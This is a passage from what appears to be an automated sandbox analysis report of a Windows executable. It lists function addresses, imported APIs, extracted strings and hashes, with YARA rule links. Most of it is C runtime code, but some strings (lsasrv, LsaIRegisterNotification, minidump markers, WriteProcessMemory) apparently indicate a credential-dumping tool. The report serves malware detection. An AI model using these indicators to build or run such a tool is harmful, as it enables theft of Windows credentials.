                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                              • API String ID: 2183313154-4022980321
                                              • Opcode ID: ee30e25ceeb64b6f7566f0a35a21b345d76023c3b733a07fe50355b554bba3a2
                                              • Instruction ID: 1155fe4861d2b457d836641930c6dfb82c488011966d81c02e97f8ea8c44357b
                                              • Opcode Fuzzy Hash: ee30e25ceeb64b6f7566f0a35a21b345d76023c3b733a07fe50355b554bba3a2
                                              • Instruction Fuzzy Hash: FC51E323B1868282FAE4DF25A4156BA2393FF85BC4FA44135EE4DC3B85DFBCE5018600
                                              Function 00007FF6097571F0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                              • String ID:
                                              • API String ID: 3778485334-0
                                              • Opcode ID: bf1be38ff80d1e36a91b635a4a1ce7a4a76762dc689d6be8787abb1f1a7dd809
                                              • Instruction ID: 8ac60b64c9aace67bcedab16713f3fcb5d53cdb6cfe2814f9412f25cafae8d3a
                                              • Opcode Fuzzy Hash: bf1be38ff80d1e36a91b635a4a1ce7a4a76762dc689d6be8787abb1f1a7dd809
                                              • Instruction Fuzzy Hash: 0F31C736909B8686EB949F15F84436A73A2FF85794F604135DA8DC3765EFBCE054CB00
                                              Function 00007FF609755540 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                              • String ID:
                                              • API String ID: 1239891234-0
                                              • Opcode ID: 5d36ba9e913c190f0612814cc419d9f76b2a0e889312af5377098d70428b273c
                                              • Instruction ID: 43345b458fd677ba2b91cf35573594db6ebea2ab0d3a42f72b589e7926733d6e
                                              • Opcode Fuzzy Hash: 5d36ba9e913c190f0612814cc419d9f76b2a0e889312af5377098d70428b273c
                                              • Instruction Fuzzy Hash: 71319233608BC286DBA4CF25E8406AE73A1FB88794F600235EA9D87B95DF7CD545CB00
                                              Function 00007FF609758834 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                              • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                              • API String ID: 2643518689-564504941
                                              • Opcode ID: f00bcf87bbbb1d6e6682388d77f3276f0af41bfeee020ad42ad2caa498c19714
                                              • Instruction ID: 53912150e2a677e1249f2cdb36dd1f322e179e2fba9d6dccbd950604d6631611
                                              • Opcode Fuzzy Hash: f00bcf87bbbb1d6e6682388d77f3276f0af41bfeee020ad42ad2caa498c19714
                                              • Instruction Fuzzy Hash: AF510922A1AB0382FE999F22B85417437A2AF45BC4F640135CD0EC3764EFBCA489C342
                                              Function 00007FF609752518 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 169libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressProc$HandleModule$InitStringUnicode
                                              • String ID: Canc$LoadLibraryW$LocalAlloc$LsaI$LsaIRegisterNotification$cati$elNo$kernel32$lsasrv$tifi
                                              • API String ID: 3738668-3948219663
                                              • Opcode ID: 5533f267b9be45899d6176bd6bf488175ef0c89ff780fd2f82d7aa3d472244e3
                                              • Instruction ID: bd492f09635da7722a4863df79009bb3105a868c30bca9ba0f1c4f2a96bb878b
                                              • Opcode Fuzzy Hash: 5533f267b9be45899d6176bd6bf488175ef0c89ff780fd2f82d7aa3d472244e3
                                              • Instruction Fuzzy Hash: 29911B37B09B46DAEB84CF65E8406B837B2EB48788F600435CA0D97765DFB8E55AC340
                                              Function 00007FF609753B74 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 149libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: FreeLocal$AddressHandleModuleProcwsprintf
                                              • String ID: %lS%lS%lS:%lS$WriteFile$kernel32
                                              • API String ID: 602150089-2677625405
                                              • Opcode ID: b11d8622920a2f47f9daaeab12ed3a5efb95e5e1c83adc421bcd68cf021e0860
                                              • Instruction ID: b3a187d9394b159ef2f2e2872927c4fb946b80ddb49305ef08d2fd377f324a14
                                              • Opcode Fuzzy Hash: b11d8622920a2f47f9daaeab12ed3a5efb95e5e1c83adc421bcd68cf021e0860
                                              • Instruction Fuzzy Hash: BE516E67B09B42C2EA94AF12A80027A63A2FF84BC4F644535DD1E877B5DFBCE546C340
                                              Function 00007FF609751000 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc$FreeLocal
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 3514375268-3502785670
                                              • Opcode ID: 16e864027eccf711ceb2599a8e25e6efffbb2f622ca0795a7aecc8477e6c70d0
                                              • Instruction ID: bca11edbb77d07c85b6db9f513527b2abb69a1d06ff3223fe40fb32262cf047e
                                              • Opcode Fuzzy Hash: 16e864027eccf711ceb2599a8e25e6efffbb2f622ca0795a7aecc8477e6c70d0
                                              • Instruction Fuzzy Hash: 1A415337B18B4286EA949F16F8402396762FB88FD5F648535CE4E87354DEBDD849C300
                                              Function 00007FF609753074 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 127libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF609753032), ref: 00007FF6097530DE
                                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF609753032), ref: 00007FF6097530EE
                                              • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF609753032), ref: 00007FF6097531C2
                                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF609753032), ref: 00007FF6097531D2
                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF609753032), ref: 00007FF609753240
                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF609753032), ref: 00007FF609753249
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLocalModuleProc
                                              • String ID: KSSM$LocalAlloc$RUUU$kernel32
                                              • API String ID: 1697219777-2069434485
                                              • Opcode ID: ff03697077344f23be60409640fc6f5bc2b2c84fe588a8c0b6027fdb40be19b8
                                              • Instruction ID: d1ded3ac3a031bc02b7ab06c8c0129994f2fc4ad546be93ab7e09a4f24516834
                                              • Opcode Fuzzy Hash: ff03697077344f23be60409640fc6f5bc2b2c84fe588a8c0b6027fdb40be19b8
                                              • Instruction Fuzzy Hash: 4C513B72B18B6296FB90CF62E8849AD77AAFB44BC8B544035DE0E83754EF78D545C700
                                              Function 00007FF609751534 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66filelibraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: File$HandleView$AddressCloseCreateMappingModuleProcUnmap
                                              • String ID: LocalAlloc$MDMP$kernel32
                                              • API String ID: 3734750734-1949004057
                                              • Opcode ID: ac78767d471d2eb992b9a504df308e303ca546f5a398330820821f7f68a337da
                                              • Instruction ID: f38017962408edd2a8ec1b1f129fd580bac57c2828f44b0647f7be9039cb1f52
                                              • Opcode Fuzzy Hash: ac78767d471d2eb992b9a504df308e303ca546f5a398330820821f7f68a337da
                                              • Instruction Fuzzy Hash: 2D215E37A09A42C2EB95CF65E45067973A2FB88F85B68C235CA0D87B14EFBCD455C700
                                              Function 00007FF60975834C Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 159COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
                                              • String ID: m*H$m*H$m*H$m*H
                                              • API String ID: 27599310-229035250
                                              • Opcode ID: d1aff7f8dd491d9a2af4ff98f426b5defa286991a079765ade965f3974373ef1
                                              • Instruction ID: 38f0f939668f34c6b05be63ba5bcfd795a4a55d24ef12f9d8daece608addf946
                                              • Opcode Fuzzy Hash: d1aff7f8dd491d9a2af4ff98f426b5defa286991a079765ade965f3974373ef1
                                              • Instruction Fuzzy Hash: E6515973E0C68287FAE98F15A4802BA66A3EB847C0F744535D94EC2794CFBCE845C202
                                              Function 00007FF609756C90 Relevance: 12.2, APIs: 8, Instructions: 206COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF609756FCD), ref: 00007FF609756D2A
                                              • malloc.LIBCMT ref: 00007FF609756D93
                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF609756FCD), ref: 00007FF609756DC7
                                              • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF609756FCD), ref: 00007FF609756DEE
                                              • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF609756FCD), ref: 00007FF609756E36
                                              • malloc.LIBCMT ref: 00007FF609756E93
                                                • Part of subcall function 00007FF609758CD4: _FF_MSGBANNER.LIBCMT ref: 00007FF609758D04
                                                • Part of subcall function 00007FF609758CD4: HeapAlloc.KERNEL32(?,?,00000000,00007FF6097574D0,?,?,?,00007FF609757395,?,?,?,00007FF60975743F), ref: 00007FF609758D29
                                                • Part of subcall function 00007FF609758CD4: _callnewh.LIBCMT ref: 00007FF609758D42
                                                • Part of subcall function 00007FF609758CD4: _errno.LIBCMT ref: 00007FF609758D4D
                                                • Part of subcall function 00007FF609758CD4: _errno.LIBCMT ref: 00007FF609758D58
                                              • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF609756FCD), ref: 00007FF609756EC8
                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF609756FCD), ref: 00007FF609756F08
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiStringWide$_errnomalloc$AllocHeap_callnewh
                                              • String ID:
                                              • API String ID: 3905601649-0
                                              • Opcode ID: 2ff4a7507a82664706b41ccc9cbd6ec1c06fa3633e00bf2ef3564a6fd6ba3400
                                              • Instruction ID: b4942dd6159699f786f13c0730bc7f6877c0a8b494a0c7b25dfdd270146f6da7
                                              • Opcode Fuzzy Hash: 2ff4a7507a82664706b41ccc9cbd6ec1c06fa3633e00bf2ef3564a6fd6ba3400
                                              • Instruction Fuzzy Hash: 4C81C533B0978286EBA48F25D84026976D6FF48BE4FA44635EA1D87BD4DFBCE5018700
                                              Function 00007FF609757334 Relevance: 9.1, APIs: 6, Instructions: 59COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockmalloc
                                              • String ID:
                                              • API String ID: 2923989369-0
                                              • Opcode ID: bc655189494912a802cf5939326c0831d488f45ff90a1d662128a5e15a8b38dc
                                              • Instruction ID: 4c14b84f1e0866868846964341ea2e1aed4ced205fb5243cc4e7a9d5526bfd98
                                              • Opcode Fuzzy Hash: bc655189494912a802cf5939326c0831d488f45ff90a1d662128a5e15a8b38dc
                                              • Instruction Fuzzy Hash: 31214C23E0968282F6D9AF21E44477E6666EF817D4F644534E94EC67D2CFBCE9408350
                                              Function 00007FF609753EF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc$FreeLocal$FileMemoryPointerProcessWrite
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 3690204003-3502785670
                                              • Opcode ID: bfe815200edb62b6d5542a813ca1b1f70e712d92eb9977d59844b44778e0b4c3
                                              • Instruction ID: c37b6fbc8525fb249a71727be3664c3e7f055f138aeb222b04f17003c8f07e7d
                                              • Opcode Fuzzy Hash: bfe815200edb62b6d5542a813ca1b1f70e712d92eb9977d59844b44778e0b4c3
                                              • Instruction Fuzzy Hash: C0312433A08B46C9EB90CF61E8401AC33B5FB487C8B544935DA4D97BA8EFB8E554C740
                                              Function 00007FF609753FEE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLocalModuleProc
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 1697219777-3502785670
                                              • Opcode ID: cb2947bb03def20f4983750d2723422282199711071f6f6c57adc94798bf4ce7
                                              • Instruction ID: c465955e6435367959681cf19875337b5a19d938c97e4590b56f9685121b0940
                                              • Opcode Fuzzy Hash: cb2947bb03def20f4983750d2723422282199711071f6f6c57adc94798bf4ce7
                                              • Instruction Fuzzy Hash: C131F763A19B0695FB80DF65E8843B823A6BB487C8F640535CA1C93764EFBCE555C710
                                              Function 00007FF609758610 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • DecodePointer.KERNEL32(?,?,?,00007FF609758725,?,?,?,?,00007FF60975598A,?,?,?,00007FF6097544D4), ref: 00007FF609758639
                                              • DecodePointer.KERNEL32(?,?,?,00007FF609758725,?,?,?,?,00007FF60975598A,?,?,?,00007FF6097544D4), ref: 00007FF609758649
                                                • Part of subcall function 00007FF60975910C: _errno.LIBCMT ref: 00007FF609759115
                                                • Part of subcall function 00007FF60975910C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF609759120
                                              • EncodePointer.KERNEL32(?,?,?,00007FF609758725,?,?,?,?,00007FF60975598A,?,?,?,00007FF6097544D4), ref: 00007FF6097586C7
                                                • Part of subcall function 00007FF6097575A4: realloc.LIBCMT ref: 00007FF6097575CF
                                                • Part of subcall function 00007FF6097575A4: Sleep.KERNEL32(?,?,00000000,00007FF6097586B7,?,?,?,00007FF609758725,?,?,?,?,00007FF60975598A), ref: 00007FF6097575EB
                                              • EncodePointer.KERNEL32(?,?,?,00007FF609758725,?,?,?,?,00007FF60975598A,?,?,?,00007FF6097544D4), ref: 00007FF6097586D7
                                              • EncodePointer.KERNEL32(?,?,?,00007FF609758725,?,?,?,?,00007FF60975598A,?,?,?,00007FF6097544D4), ref: 00007FF6097586E4
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                              • String ID:
                                              • API String ID: 1909145217-0
                                              • Opcode ID: e41475865cdc026077d39e2ccd95283321267069a2bcd4671505f549074d287f
                                              • Instruction ID: 451411fbce285edd9a52ee85c006ef07897ebfab9190935c0f9a2365ec0d9568
                                              • Opcode Fuzzy Hash: e41475865cdc026077d39e2ccd95283321267069a2bcd4671505f549074d287f
                                              • Instruction Fuzzy Hash: E4217F62B0A743C2EB849F62E9480A963A2FF44BD0F644435D90DC775AEEBCE485C345
                                              Function 00007FF609756A58 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                              • String ID:
                                              • API String ID: 1445889803-0
                                              • Opcode ID: b5717c3ae1978e90090d18bddf620ebef6e1dda1b2ac5f81843dbc827e59ee84
                                              • Instruction ID: 27aa928488716122c45be10ff05724fc359213b8cf3cc5ea5f0f20163cb8477e
                                              • Opcode Fuzzy Hash: b5717c3ae1978e90090d18bddf620ebef6e1dda1b2ac5f81843dbc827e59ee84
                                              • Instruction Fuzzy Hash: A801AD22B28A4582F7908F21F9506653362FF49BD1F642630EE5E877A0EEBCD984C700
                                              Function 00007FF609755200 Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,00007FF6097557A1,?,?,?,?,00007FF6097542F5,?,?,?,?,00007FF60975365D), ref: 00007FF60975520A
                                              • FlsGetValue.KERNEL32(?,?,?,00007FF6097557A1,?,?,?,?,00007FF6097542F5,?,?,?,?,00007FF60975365D), ref: 00007FF609755218
                                              • SetLastError.KERNEL32(?,?,?,00007FF6097557A1,?,?,?,?,00007FF6097542F5,?,?,?,?,00007FF60975365D), ref: 00007FF609755270
                                                • Part of subcall function 00007FF609757520: Sleep.KERNEL32(?,?,?,00007FF609755233,?,?,?,00007FF6097557A1,?,?,?,?,00007FF6097542F5), ref: 00007FF609757565
                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6097557A1,?,?,?,?,00007FF6097542F5,?,?,?,?,00007FF60975365D), ref: 00007FF609755244
                                              • GetCurrentThreadId.KERNEL32 ref: 00007FF609755258
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: ErrorLastValue_lock$CurrentSleepThread
                                              • String ID:
                                              • API String ID: 2194181773-0
                                              • Opcode ID: 36c60fb1fc5478d2714b7cf1bc2d67d0d037515c9517970b45afcbe01da3439c
                                              • Instruction ID: a34f9f211ff8872bfb8a287e12c707944f87aac17e1eefcea891980feafb9f00
                                              • Opcode Fuzzy Hash: 36c60fb1fc5478d2714b7cf1bc2d67d0d037515c9517970b45afcbe01da3439c
                                              • Instruction Fuzzy Hash: B2012162E0974282FBD99F75A44507D26A3AF48BE0F284334D91EC23D5EE7CE444C611
                                              Function 00007FF6097541D4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
